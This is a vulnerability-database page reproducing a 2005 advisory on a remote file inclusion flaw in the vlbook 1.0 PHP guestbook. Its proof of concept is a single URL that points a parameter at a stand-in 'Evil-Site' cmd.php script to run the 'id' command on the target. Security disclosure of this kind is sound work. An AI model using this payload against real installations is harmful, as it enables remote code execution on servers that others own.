Lucene search

vlbook10.txt

🗓️ 11 Oct 2005 00:00:00Reported by BiPi_HaCkType

packetstorm🔗 packetstormsecurity.com👁 25 Views

Remote file inclusion vulnerability found in vlbook 1.0 guestbook impacting installations.

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`------------------------------------------------------  
Nightmare TeAmZ Advisory 005  
------------------------------------------------------  
Date - 10/2005  
vlbook Remote File Inclusion  
  
  
AFFECTED PRODUCTS  
=================  
vlbook 1.0 Guestbook  
http://vlbook.com/  
  
  
OVERVIEW  
========  
he vlbook is a free, open source and light-weight guestbook written in PHP   
using flat files to store  
  
messages and settings. It comes with install script for quick and effortless   
installation.  
  
  
DETAILS  
=======  
  
1. Remote File Inclusion  
  
  
POC  
===  
  
1.  
------  
Remote File Inclusion  
  
Exemple  
--------  
1. Remote File Inclusion  
  
Vulnerable Path:  
  
/index.php?user=  
  
Exemple:  
  
www.[Host].com/[Path]/index.php?user=english&l=1&t=1&a=http://www.[Evil-Site.org/cmd.php?&cmd=id  
  
  
Credits  
=======  
This vulnerability was discovered and researched by  
BiPi_HaCk, Advisory by Sub_Z3r0 of Nightmare TeAmZ,  
  
Site: http://www.NightmareTeAmZ.altervista.org  
  
_________________________________________________________________  
Blocca le pop-up pubblicitarie con MSN Toolbar! http://toolbar.msn.it/  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

11 Oct 2005 00:00Current

7.4High risk

Vulners AI Score7.4